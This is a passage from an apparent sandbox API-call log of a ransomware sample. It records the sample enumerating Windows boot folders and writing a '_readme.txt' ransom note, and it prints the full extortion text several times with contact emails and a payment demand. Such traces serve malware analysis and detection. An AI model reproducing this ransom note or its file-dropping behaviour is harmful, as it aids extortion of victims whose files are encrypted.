e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.382] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.382] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.383] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*" (normalized: "c:\\boot\\pt-br\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.384] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.384] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.384] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.384] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.385] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.400] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0180.400] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.400] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.400] PathFindFileNameW (pszPath="") returned="" [0180.400] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.400] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.401] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.401] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.401] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0180.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.401] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0180.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.401] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.401] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.402] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.403] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*" (normalized: "c:\\boot\\pt-pt\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.404] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, 